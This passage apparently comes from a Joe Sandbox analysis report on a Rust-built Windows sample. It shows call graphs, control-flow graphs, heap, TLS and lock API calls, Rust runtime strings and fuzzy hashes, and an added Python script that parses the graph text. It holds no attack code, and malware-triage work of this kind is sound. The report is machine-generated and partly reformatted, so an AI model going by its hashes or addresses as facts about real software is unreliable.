75 API calls 2410->2414 2417 11a22a0 2411->2417 2412->2392 2413->2390 2414->2405 2416->2390 2418 11a2420 76 API calls 2417->2418 2419 11a22d9 2418->2419 2420 11a238c 2419->2420 2421 11a22e1 2419->2421 2423 12dc380 76 API calls 2420->2423 2422 11a2314 2421->2422 2425 11a22fe 2421->2425 2426 11a2316 2421->2426 2424 11a237b 2422->2424 2428 11a2260 2 API calls 2422->2428 2427 11a23a0 2423->2427 2424->2390 2429 11a2300 WaitOnAddress 2425->2429 2426->2422 2433 11a2340 2426->2433 2434 11a23a5 2426->2434 2455 11a24f0 2427->2455 2428->2424 2429->2422 2429->2429 2433->2422 2435 11a2352 CloseHandle 2433->2435 2437 12dbef0 76 API calls 2434->2437 2435->2422 2437->2427 2449 11a2219 2438->2449 2450 11a20f0 2438->2450 2439 11a20f5 2439->2393 2441 11a21b8 2444 12dc040 77 API calls 2441->2444 2442 11a2238 2443 11a2257 2442->2443 2445 11a2260 2 API calls 2442->2445 2443->2393 2446 11a21d3 2444->2446 2445->2443 2448 12dbef0 77 API calls 2446->2448 2447 11a2260 2 API calls 2447->2450 2448->2449 2462 12e69c0 2449->2462 2450->2439 2450->2441 2450->2446 2450->2447 2451 11a2192 CloseHandle 2450->2451 2451->2450 2453 12dbef0 78 API calls 2452->2453 2454 12dc3cf 2453->2454 2456 11a1d20 2 API calls 2455->2456 2457 11a253a 2456->2457 2458 11a1e80 2 API calls 2457->2458 2459 11a254a GetModuleHandleA 2458->2459 2460 11a256f GetProcAddress 2459->2460 2461 11a257e 2459->2461 2460->2461 2463 12dc0b0 78 API calls 2462->2463 2464 12e69ee 2463->2464 2465 12e69fa 2464->2465 2466 12e6430 78 API calls 2464->2466 2465->2442 2467 12e6a3a 2466->2467 2467->2442 2468 fb1280 2469 fb1293 RtlReAllocateHeap 2468->2469 2470 fb12a5 2468->2470 2471 fb1305 2469->2471 2472 fb12bf HeapAlloc 2470->2472 2473 fb12b0 GetProcessHeap 2470->2473 2472->2471 2475 fb12d1 2472->2475 2473->2471 2474 fb12ba 2473->2474 2474->2472 2476 fb12ef HeapFree 2475->2476 2476->2471 2477 12e6430 2478 12e6470 2477->2478 2479 12e6695 2478->2479 2480 12e64a0 2478->2480 2481 12e66cc 2478->2481 2483 12e64c3 2478->2483 2486 12e64e7 TlsGetValue 
2478->2486 2489 12e651d TlsGetValue 2478->2489 2491 12e6800 75 API calls 2478->2491 2493 12e6530 2478->2493 2494 fb1220 3 API calls 2478->2494 2495 11a1b80 75 API calls 2478->2495 2496 12e6734 2478->2496 2498 12e66dd 2478->2498 2499 12e6660 2478->2499 2501 11a2260 HeapFree HeapFree 2478->2501 2504 12e657b TlsSetValue 2478->2504 2482 12e66b7 2479->2482 2485 12dbef0 75 API calls 2480->2485 2484 11a20b0 75 API calls 2482->2484 2487 12dc040 75 API calls 2483->2487 2484->2481 2485->2483 2486->2478 2488 12e6798 2487->2488 2490 12e67b7 2488->2490 2492 11a2260 2 API calls 2488->2492 2489->2478 2491->2478 2492->2490 2497 12dc380 75 API calls 2493->2497 2494->2478 2495->2478 2500 12dbae0 75 API calls 2496->2500 2497->2496 2502 12dbef0 75 API calls 2498->2502 2503 11a22a0 75 API calls 2499->2503 2500->2480 2501->2478 2502->2493 2503->2478 2504->2478 2505 12d6992 2508 12d7420 2505->2508 2507 12d6997 2507->2507 2509 12d7436 2508->2509 2511 12d743f 2509->2511 2512 12d73d3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 2509->2512 2511->2507 2512->2511

                                                                            Callgraph

                                                                            • Executed
                                                                            • Not Executed
                                                                            • Opacity -> Relevance
                                                                            • Disassembly available
                                                                            [Callgraph rendered as an image on the original page: 75 function nodes numbered 0-74 (Function_00FBA170 through Function_012E6950) with their call edges; the raw node/edge list is not reproduced.]

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph (function 00FB1220; block id, address range, API called in the block, successor blocks):
                                                                            110 fb1220-fb122d -> 111, 112
                                                                            111 fb122f-fb1232 -> 113, 114
                                                                            112 fb1240-fb1248 GetProcessHeap -> 115, 116
                                                                            113 fb1254-fb1262 HeapAlloc -> 116, 118
                                                                            114 fb1234-fb123e RtlAllocateHeap -> 117
                                                                            115 fb124a-fb1252 -> 113, 114
                                                                            116 fb1275 -> 119
                                                                            117 fb1279-fb127b
                                                                            118 fb1264-fb1273 -> 119
                                                                            119 fb1277 -> 117
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(00000000,00000000,0000000C,?,?,?,?,?,?,?,?,?,?), ref: 00FB1238
                                                                            • GetProcessHeap.KERNEL32(?,?,012E6556,?,?,?,?,?,?,?,?,?,?), ref: 00FB1240
                                                                            • HeapAlloc.KERNEL32(00000000,00000000,0000000C,?,?,?,?,?,?,?,?,?,?), ref: 00FB125A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2711833412.0000000000F91000.00000020.00000001.01000000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                            • Associated: 00000000.00000002.2711803042.0000000000F90000.00000002.00000001.01000000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.2712079371.00000000012EA000.00000002.00000001.01000000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.2712079371.0000000001339000.00000002.00000001.01000000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.2712217704.000000000141B000.00000004.00000001.01000000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.2712249437.000000000141E000.00000008.00000001.01000000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.2712279862.000000000141F000.00000004.00000001.01000000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.2712310372.0000000001421000.00000002.00000001.01000000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_f90000_888.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$AllocAllocateProcess
                                                                            • String ID:
                                                                            • API String ID: 884036251-0
                                                                            • Opcode ID: 73ff38f242743b39a9d2804785fce9c5fe7f8a5c382eefa718c69c3dbd8472b9
                                                                            • Instruction ID: 40c27f5fa0e2b69ada2d7d07ba2f053f514d9b31dc4bc23709ec0f7be954b313
                                                                            • Opcode Fuzzy Hash: 73ff38f242743b39a9d2804785fce9c5fe7f8a5c382eefa718c69c3dbd8472b9
                                                                            • Instruction Fuzzy Hash: 36F0BB32B0421157DF384A3ABC2DBDB6BD8B786760B55042DF416D7294EA74CC049B54
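The control-flow graph and the API list above are rendered as flat text: nodes as "<id> <start>-<end> [label ...]", edges as "<src>-><dst>", and API entries as "Name.MODULE(args), ref: <call-site address>". The following parser is an added example, not Joe Sandbox code; its grammar is inferred only from the graph lines on this page, and the embedded input is the 00FB1220 record copied from this report. It rebuilds the graph, then joins each API entry to the block whose address range contains its call site, so argument values can be read next to the graph position.

```python
"""Parse this report's text rendering of a function's control-flow graph and
API list, then join the two by call-site address.
Added example, not Joe Sandbox code; the grammar is inferred from the graph
lines on this page and may not cover every rendering the product produces."""
import re
from dataclasses import dataclass, field

# Copied from this page: graph and API list of the record for function 00FB1220.
CFG_FB1220 = (
    "control_flow_graph 110 fb1220-fb122d 111 fb122f-fb1232 110->111 "
    "112 fb1240-fb1248 GetProcessHeap 110->112 113 fb1254-fb1262 HeapAlloc "
    "111->113 114 fb1234-fb123e RtlAllocateHeap 111->114 115 fb124a-fb1252 "
    "112->115 116 fb1275 112->116 113->116 118 fb1264-fb1273 113->118 "
    "117 fb1279-fb127b 114->117 115->113 115->114 119 fb1277 116->119 "
    "118->119 119->117"
)
APIS_FB1220 = """
RtlAllocateHeap.NTDLL(00000000,00000000,0000000C,?,?,?,?,?,?,?,?,?,?), ref: 00FB1238
GetProcessHeap.KERNEL32(?,?,012E6556,?,?,?,?,?,?,?,?,?,?), ref: 00FB1240
HeapAlloc.KERNEL32(00000000,00000000,0000000C,?,?,?,?,?,?,?,?,?,?), ref: 00FB125A
"""

@dataclass
class Block:
    bid: int
    start: int
    end: int
    labels: list = field(default_factory=list)  # API names or "call <addr>"
    succ: list = field(default_factory=list)

@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: int  # call-site address

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
RANGE_RE = re.compile(r"^([0-9a-f]+)(?:-([0-9a-f]+))?$")
API_RE = re.compile(r"^\s*\u2022?\s*(\w+)\.([A-Z0-9]+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)\s*$")

def parse_cfg(text):
    """Return {block_id: Block}. Tokens are read left to right: an integer
    followed by a hex range opens a node, 'a->b' is an edge, and any other
    token is a label attached to the most recently opened node."""
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks, current, i = {}, None, 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            src, dst = int(edge.group(1)), int(edge.group(2))
            if src not in blocks:
                raise ValueError(f"edge {tok} references undefined block {src}")
            blocks[src].succ.append(dst)
            i += 1
        elif tok.isdigit() and i + 1 < len(tokens) and RANGE_RE.match(tokens[i + 1]):
            rng = RANGE_RE.match(tokens[i + 1])
            start = int(rng.group(1), 16)
            end = int(rng.group(2), 16) if rng.group(2) else start
            current = blocks[int(tok)] = Block(int(tok), start, end)
            i += 2
        elif current is None:
            raise ValueError(f"label {tok!r} before any node")
        elif tok == "call" and i + 1 < len(tokens):
            current.labels.append("call " + tokens[i + 1])  # internal call target
            i += 2
        else:
            current.labels.append(tok)  # imported API name
            i += 1
    return blocks

def parse_api_list(text):
    """Return the API-list entries as ApiCall records (one per matching line)."""
    calls = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            calls.append(ApiCall(m.group(1), m.group(2), m.group(3).split(","), int(m.group(4), 16)))
    return calls

def block_for_address(blocks, addr):
    return next((b for b in blocks.values() if b.start <= addr <= b.end), None)

def reachable(blocks, start):
    """Block ids reachable from `start` by following successor edges."""
    seen, stack = set(), [start]
    while stack:
        n = stack.pop()
        if n not in seen:
            seen.add(n)
            stack.extend(blocks[n].succ if n in blocks else [])
    return seen

def join_calls(blocks, calls):
    """Map each API-list entry to the block whose address range holds its call site."""
    out = {}
    for c in calls:
        b = block_for_address(blocks, c.ref)
        out[c.name] = b.bid if b else None
    return out

def api_paths(blocks):
    """For every block that names an imported API: its labels and successors."""
    return {b.bid: (list(b.labels), list(b.succ)) for b in blocks.values()
            if any(not l.startswith("call ") for l in b.labels)}

if __name__ == "__main__":
    blocks = parse_cfg(CFG_FB1220)
    calls = parse_api_list(APIS_FB1220)
    entry = min(blocks, key=lambda k: blocks[k].start)
    print("entry block", entry, "reaches", sorted(reachable(blocks, entry)))
    print("API call sites by block:", join_calls(blocks, calls))
    for bid, (labels, succ) in sorted(api_paths(blocks).items()):
        print(f"block {bid} {labels} -> {succ}")
```

Run on the 00FB1220 record, the join places the RtlAllocateHeap call site (ref 00FB1238) in block 114, GetProcessHeap (00FB1240) in block 112 and HeapAlloc (00FB125A) in block 113, matching the graph. Reading the successors then shows that block 111 goes to either HeapAlloc (113) or RtlAllocateHeap (114), while block 112 fetches the process heap first and reaches the same two blocks through 115, which is the shape of a small allocator wrapper around the two heap APIs. The same parser applies to the 00FB1280 record below; the large graphs for 012E6430 and 011BEB20 add "call <addr>" labels, which the tokenizer keeps as internal-call labels.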

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • SetThreadStackGuarantee.KERNELBASE(?), ref: 011B9D78
                                                                            • GetLastError.KERNEL32 ref: 011B9D82
                                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 011B9DCB
                                                                            • HeapFree.KERNEL32(00000000,?), ref: 011B9DDC
                                                                            • HeapFree.KERNEL32(00000000,?), ref: 011B9E6D
                                                                            • HeapFree.KERNEL32(00000000,?), ref: 011B9E7E
                                                                            Strings
                                                                            • chunk size must be non-zero, xrefs: 011B9E14
                                                                            Memory Dump Source / Joe Sandbox IDA Plugin: same as for the 00FB1220 record above (source file 00000000.00000002.2711833412.0000000000F91000.00000020.00000001.01000000.00000000.sdmp, offset 00F90000, based on PE; snapshot hcaresult_0_2_f90000_888.jbxd)
                                                                            Similarity
                                                                            • API ID: FreeHeap$ErrorGuaranteeLastStackThread
                                                                            • String ID: chunk size must be non-zero
                                                                            • API String ID: 3680998240-1054586041
                                                                            • Opcode ID: 08ece91d9a1f071f6786d955e97d099a57e3d9e8d2a1ad0afc96d1b9fe4b205f
                                                                            • Instruction ID: f016988aa2b704e41de49525eda259e7396e2a25c0ab8bc4f41e270a3d3dea18
                                                                            • Opcode Fuzzy Hash: 08ece91d9a1f071f6786d955e97d099a57e3d9e8d2a1ad0afc96d1b9fe4b205f
                                                                            • Instruction Fuzzy Hash: D34139B5900208DFDB15DF98E888BDDBBF5FB08718F108019E914AB2A0D375A949CF94

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            [Control-flow graph for function 012E6430, blocks 12e6430-12e67bb. Imported APIs called: TlsGetValue (blocks at 12e64e7 and 12e651d) and TlsSetValue (12e657b). Internal calls: 11a20b0, 12dbef0, 12dc040, 11a2260, 12e6800, fb1220, 11a1b80, 12dc380, 12dbae0, 11a22a0. The raw node/edge list of the graph image is not reproduced.]
                                                                            Strings
                                                                            • chunk size must be non-zero, xrefs: 012E66FA, 012E6765
                                                                            • use of std::thread::current() is not possible after the thread's local data has been destroyed, xrefs: 012E6720
                                                                            Memory Dump Source / Joe Sandbox IDA Plugin: same as for the 00FB1220 record above (source file 00000000.00000002.2711833412.0000000000F91000.00000020.00000001.01000000.00000000.sdmp, offset 00F90000, based on PE; snapshot hcaresult_0_2_f90000_888.jbxd)
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: chunk size must be non-zero$use of std::thread::current() is not possible after the thread's local data has been destroyed
                                                                            • API String ID: 0-991767630
                                                                            • Opcode ID: 697cc5a2e74f4c5e98be0a4c47df8675c3873dadc2bd563f524dccd25acd877c
                                                                            • Instruction ID: 86566d5d15afa405c81cc788e7442885d114109a7f1e57a86da36e348ad02808
                                                                            • Opcode Fuzzy Hash: 697cc5a2e74f4c5e98be0a4c47df8675c3873dadc2bd563f524dccd25acd877c
                                                                            • Instruction Fuzzy Hash: F391F3B1A2021A8FDF25DFA8D8483AEBBF1FF24324F544219D624AB3D5D7749801CB90

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph (function 00FB1280; block id, address range, API called in the block, successor blocks):
                                                                            98 fb1280-fb1291 -> 99, 100
                                                                            99 fb1293-fb12a3 RtlReAllocateHeap -> 101
                                                                            100 fb12a5-fb12ae -> 102, 103
                                                                            101 fb1309-fb130d
                                                                            102 fb12bf-fb12cf HeapAlloc -> 105, 106
                                                                            103 fb12b0-fb12b8 GetProcessHeap -> 104, 105
                                                                            104 fb12ba -> 102
                                                                            105 fb1305 -> 108
                                                                            106 fb12d1-fb1303 call 12d7940, HeapFree -> 108
                                                                            108 fb1307 -> 101
                                                                            APIs
                                                                            • RtlReAllocateHeap.NTDLL(00000000,?,?,?,?,00000000,?,011A485D,00000000,?,?,00000004,?,012E6AE0,00000000), ref: 00FB129D
                                                                            • GetProcessHeap.KERNEL32(?,?,00000000,?,011A485D,00000000,?,?,00000004,?,012E6AE0,00000000), ref: 00FB12B0
                                                                            • HeapAlloc.KERNEL32(00920000,00000000,?,?,?,00000000,?,011A485D,00000000,?,?,00000004,?,012E6AE0,00000000), ref: 00FB12C7
                                                                            • HeapFree.KERNEL32(00000000,?), ref: 00FB12FD
                                                                            Memory Dump Source / Joe Sandbox IDA Plugin: same as for the 00FB1220 record above (source file 00000000.00000002.2711833412.0000000000F91000.00000020.00000001.01000000.00000000.sdmp, offset 00F90000, based on PE; snapshot hcaresult_0_2_f90000_888.jbxd)
                                                                            Similarity
                                                                            • API ID: Heap$AllocAllocateFreeProcess
                                                                            • String ID:
                                                                            • API String ID: 3553877500-0
                                                                            • Opcode ID: 3f723509a33b035fb177e78b986216a583bd15c986a95e07f3854edd932308de
                                                                            • Instruction ID: d49aa1b3537a3ed7c892cacb5828ca78181fab1b150fc8dc67f62ce795549b5b
                                                                            • Opcode Fuzzy Hash: 3f723509a33b035fb177e78b986216a583bd15c986a95e07f3854edd932308de
                                                                            • Instruction Fuzzy Hash: 2901D272704201AFD7209F66FC8CBAB7BE8FB85354F550138F405D3654EBB498089BA0

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            [Control-flow graph for function 011BEB20, blocks 11beb20-11bf179. Imported APIs called: AcquireSRWLockShared, ReleaseSRWLockShared, AcquireSRWLockExclusive, ReleaseSRWLockExclusive. Internal calls: 11a1d20, 11a3bc0, 11a1e80, 12dc300, 11a2420, 11a2260, 11bdf60, 11b1340, 11afde0, 11b1330, 12e6bb0, 107d250. The raw node/edge list of the graph image is not reproduced.]
APIs
  • Part of subcall function 011A3BC0: TlsGetValue.KERNEL32(00000000,?,011BEB80), ref: 011A3BD0
• AcquireSRWLockShared.KERNEL32(0141F9F4), ref: 011BEBDE
• ReleaseSRWLockShared.KERNEL32(0141F9F4), ref: 011BED82
• ReleaseSRWLockExclusive.KERNEL32(?), ref: 011BEFD0
  • Part of subcall function 011A2260: HeapFree.KERNEL32(00000000,00000000,?,011BF171), ref: 011A227C
  • Part of subcall function 011A2260: HeapFree.KERNEL32(00000000,?,?,011BF171), ref: 011A2296
Memory Dump Source
• Source File: 00000000.00000002.2711833412.0000000000F91000.00000020.00000001.01000000.00000000.sdmp, Offset: 00F90000, based on PE: true
• Associated: 00000000.00000002.2711803042.0000000000F90000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000000.00000002.2712079371.00000000012EA000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000000.00000002.2712079371.0000000001339000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000000.00000002.2712217704.000000000141B000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000000.00000002.2712249437.000000000141E000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000000.00000002.2712279862.000000000141F000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000000.00000002.2712310372.0000000001421000.00000002.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f90000_888.jbxd
Similarity
• API ID: Lock$FreeHeapReleaseShared$AcquireExclusiveValue
• String ID: Box<dyn Any><unnamed>$cannot access a Thread Local Storage value during or after destruction/rustc/07dca489ac2d933c78d3c5158e3f43beefeb02ce\library\std\src\thread\local.rs$chunk size must be non-zero
• API String ID: 1439667220-2790338109
Similarity
• API ID:
• String ID: UNC\$chunk size must be non-zero
• API String ID: 0-4000572898
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
Memory Dump Source
• Source File: 00000000.00000003.2632131370.00000000009A0000.00000004.00000020.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_9a0000_888.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph of function 11bca40
APIs
• TlsGetValue.KERNEL32(00000000,00000000,012E6F25), ref: 011BCA4C
• TlsGetValue.KERNEL32(00000000), ref: 011BCA6A
• TlsSetValue.KERNEL32(00000000,00000000), ref: 011BCAAD
  • Part of subcall function 012E6800: InitOnceBeginInitialize.KERNEL32(0141B18C,00000000,00000000,00000000), ref: 012E6823
  • Part of subcall function 012E6800: TlsAlloc.KERNEL32 ref: 012E683C
  • Part of subcall function 012E6800: InitOnceComplete.KERNEL32(0141B18C,00000000,00000000), ref: 012E6879
  • Part of subcall function 012E6800: TlsAlloc.KERNEL32 ref: 012E6881
  • Part of subcall function 012E6800: InitOnceComplete.KERNEL32(0141B18C,00000004,00000000,?,013D161C), ref: 012E68DF
• GetModuleHandleA.KERNEL32(kernel32), ref: 011BCBA5
• GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 011BCBB5
Strings
• GetSystemTimePreciseAsFileTime, xrefs: 011BCBAF
• overflow when adding duration to instantlibrary\std\src\time.rs, xrefs: 011BCB59
• chunk size must be non-zero, xrefs: 011BCB8B
• kernel32, xrefs: 011BCBA0
Similarity
• API ID: InitOnceValue$AllocComplete$AddressBeginHandleInitializeModuleProc
• String ID: GetSystemTimePreciseAsFileTime$chunk size must be non-zero$kernel32$overflow when adding duration to instantlibrary\std\src\time.rs
• API String ID: 3931988749-618619756

Control-flow Graph of function 12e6800
APIs
• InitOnceBeginInitialize.KERNEL32(0141B18C,00000000,00000000,00000000), ref: 012E6823
• TlsAlloc.KERNEL32 ref: 012E683C
• InitOnceComplete.KERNEL32(0141B18C,00000000,00000000), ref: 012E6879
• TlsAlloc.KERNEL32 ref: 012E6881
• TlsFree.KERNEL32 ref: 012E68AC
• InitOnceComplete.KERNEL32(0141B18C,00000004,00000000,?,013D161C), ref: 012E68DF
Similarity
• API ID: InitOnce$AllocComplete$BeginFreeInitialize
• String ID: chunk size must be non-zero
• API String ID: 977713646-1054586041

Control-flow Graph of function 11bdf60
APIs
• HeapFree.KERNEL32(00000000,00000000), ref: 011BE044
• HeapFree.KERNEL32(00000000,?), ref: 011BE055
• HeapFree.KERNEL32(00000000,00000000), ref: 011BE18F
• HeapFree.KERNEL32(00000000,?), ref: 011BE1A0
Strings
• chunk size must be non-zero, xrefs: 011BE0E7
Similarity
• API ID: FreeHeap
• String ID: chunk size must be non-zero
• API String ID: 3298025750-1054586041

Control-flow Graph of function 11c0230
APIs
  • Part of subcall function 011BDE20: HeapFree.KERNEL32(00000000,00000000), ref: 011BDEE5
  • Part of subcall function 011BDE20: HeapFree.KERNEL32(00000000,?), ref: 011BDEF6
  • Part of subcall function 011C0230: TlsGetValue.KERNEL32(00000000,012DBAEB,012E674A,?,?,?,?,?,?,?,?,?,?), ref: 011C0263
• TlsGetValue.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 011C0286
• TlsSetValue.KERNEL32(-00000001,00000000,?,?,?,?,?,?,?,?,?,?), ref: 011C0300
• TlsSetValue.KERNEL32(00000000,00000001), ref: 011C03B9
• HeapFree.KERNEL32(00000000,?), ref: 011C03E2
  • Part of subcall function 012E6800: InitOnceBeginInitialize.KERNEL32(0141B18C,00000000,00000000,00000000), ref: 012E6823
  • Part of subcall function 012E6800: TlsAlloc.KERNEL32 ref: 012E683C
  • Part of subcall function 012E6800: InitOnceComplete.KERNEL32(0141B18C,00000000,00000000), ref: 012E6879
• TlsSetValue.KERNEL32(00000000,00000000), ref: 011C0406
                                                                            Similarity
                                                                            • API ID: Value$FreeHeap$InitOnce$AllocBeginCompleteInitialize
                                                                            • String ID:
                                                                            • API String ID: 16637642-0
                                                                            • Opcode ID: 47aaf42130de2d1d956375a0c9d62e381593cd8b1b388e35cfa9cd3f7829fc77
                                                                            • Instruction ID: 0a780de9d504e36f54f7a4a4134320fed5ddaab0ac6538b93ff21094a6ceda88
                                                                            • Opcode Fuzzy Hash: 47aaf42130de2d1d956375a0c9d62e381593cd8b1b388e35cfa9cd3f7829fc77
                                                                            • Instruction Fuzzy Hash: 8F51CF74A04206CFEB28DF69D81876B7BE6FF68A44F05842DF9069B294D7759800CB91

                                                                            Control-flow Graph (function starting at 11AFDE0; rendered graph not reproduced here)
                                                                            APIs
                                                                            • TlsGetValue.KERNEL32(00000000,?,80000000,011BEFEC), ref: 011AFDF1
                                                                            • TlsGetValue.KERNEL32(00000000,?,80000000,011BEFEC), ref: 011AFE1B
                                                                            • TlsSetValue.KERNEL32(00000000,00000000,?,80000000,011BEFEC), ref: 011AFE61
                                                                            • TlsSetValue.KERNEL32(00000000,00000001), ref: 011AFF39
                                                                            • HeapFree.KERNEL32(00000000,?), ref: 011AFF62
                                                                              • Part of subcall function 012E6800: InitOnceBeginInitialize.KERNEL32(0141B18C,00000000,00000000,00000000), ref: 012E6823
                                                                              • Part of subcall function 012E6800: TlsAlloc.KERNEL32 ref: 012E683C
                                                                              • Part of subcall function 012E6800: InitOnceComplete.KERNEL32(0141B18C,00000000,00000000), ref: 012E6879
                                                                            • TlsSetValue.KERNEL32(00000000,00000000), ref: 011AFF86
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2711833412.0000000000F91000.00000020.00000001.01000000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_f90000_888.jbxd
                                                                            Similarity
                                                                            • API ID: Value$InitOnce$AllocBeginCompleteFreeHeapInitialize
                                                                            • String ID:
                                                                            • API String ID: 2438581317-0
                                                                            • Opcode ID: eec51556dc9b817eb779438dca33d8a5b76de9ca98b78f9a1a719a692d8d1758
                                                                            • Instruction ID: d5247ea474716996b55995786eb42c9e46292fab47d6b7ada5940577f9682001
                                                                            • Opcode Fuzzy Hash: eec51556dc9b817eb779438dca33d8a5b76de9ca98b78f9a1a719a692d8d1758
                                                                            • Instruction Fuzzy Hash: A241E2756002178BE7289F69D84C76EBFF9FF44790F864419EA05DB291C774D802CBA1

                                                                            Control-flow Graph (function starting at 11A24F0; rendered graph not reproduced here)
                                                                            APIs
                                                                              • Part of subcall function 011A1E80: HeapFree.KERNEL32(00000000,00000000), ref: 011A1EF3
                                                                              • Part of subcall function 011A1E80: HeapFree.KERNEL32(00000000,?), ref: 011A1F02
                                                                            • GetModuleHandleA.KERNEL32(ntdll), ref: 011A2565
                                                                            • GetProcAddress.KERNEL32(00000000,NtWaitForKeyedEvent), ref: 011A2575
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2711833412.0000000000F91000.00000020.00000001.01000000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_f90000_888.jbxd
                                                                            Similarity
                                                                            • API ID: FreeHeap$AddressHandleModuleProc
                                                                            • String ID: NtWaitForKeyedEvent$ntdll
                                                                            • API String ID: 2009576768-2815205136
                                                                            • Opcode ID: d00fc08d18e4a5a3de6e7a4b5aeda1c9e4bfb6035a7757592c4c84e9a3647983
                                                                            • Instruction ID: 73c0996e805be82a206ec1116678b3192efb7de3f0478c522f3c6fdf607affdd
                                                                            • Opcode Fuzzy Hash: d00fc08d18e4a5a3de6e7a4b5aeda1c9e4bfb6035a7757592c4c84e9a3647983
                                                                            • Instruction Fuzzy Hash: A10112B4508302AFD304DF25D55575B7FE5FB88748F50891DF89597340E7B4D9088B92

                                                                            Control-flow Graph (function starting at 11A22A0; rendered graph not reproduced here)
                                                                            APIs
                                                                            • WaitOnAddress.KERNELBASE(?,013D1650,00000001,000000FF), ref: 011A230A
                                                                            • CloseHandle.KERNEL32(FFFFFFFF), ref: 011A2355
                                                                            Strings
                                                                            • use of std::thread::current() is not possible after the thread's local data has been destroyed, xrefs: 011A238C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2711833412.0000000000F91000.00000020.00000001.01000000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_f90000_888.jbxd
                                                                            Similarity
                                                                            • API ID: AddressCloseHandleWait
                                                                            • String ID: use of std::thread::current() is not possible after the thread's local data has been destroyed
                                                                            • API String ID: 592885855-1431102515
                                                                            • Opcode ID: 3f1f1d019ef3de2486efc8cdb2cebfce7d5ed4f9e7f3ec03ad90291dc173bf86
                                                                            • Instruction ID: c080cbc79931cdfed8187177e1a0c6226c6bd30a890e12db0226d09c030f8afa
                                                                            • Opcode Fuzzy Hash: 3f1f1d019ef3de2486efc8cdb2cebfce7d5ed4f9e7f3ec03ad90291dc173bf86
                                                                            • Instruction Fuzzy Hash: 17410F7AD002098BDB2ADFA8DC40BAEBFB5FF49328F540219E924673C1D7716905CB90

                                                                            Control-flow Graph (function starting at 11A3BC0; rendered graph not reproduced here)
                                                                            APIs
                                                                            • TlsGetValue.KERNEL32(00000000,?,011BEB80), ref: 011A3BD0
                                                                            • TlsGetValue.KERNEL32(00000000,?,011BEB80), ref: 011A3BF1
                                                                            • TlsSetValue.KERNEL32(00000000,00000000,?,011BEB80), ref: 011A3C37
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2711833412.0000000000F91000.00000020.00000001.01000000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_f90000_888.jbxd
                                                                            Similarity
                                                                            • API ID: Value
                                                                            • String ID:
                                                                            • API String ID: 3702945584-0
                                                                            • Opcode ID: d0d2ee32e8d80ab474222de63067bce7218db3f98d4cb35701a4cb1e4b0f6c70
                                                                            • Instruction ID: 47e348035b4496797b4866076554fa3c11d0e04c2fc7dd8e46a8ad3effe27c7b
                                                                            • Opcode Fuzzy Hash: d0d2ee32e8d80ab474222de63067bce7218db3f98d4cb35701a4cb1e4b0f6c70
                                                                            • Instruction Fuzzy Hash: 6F31F4B45103098FEB28DF69E80C7AABFF5FB04350F85841AE915DB294C338D844CBA1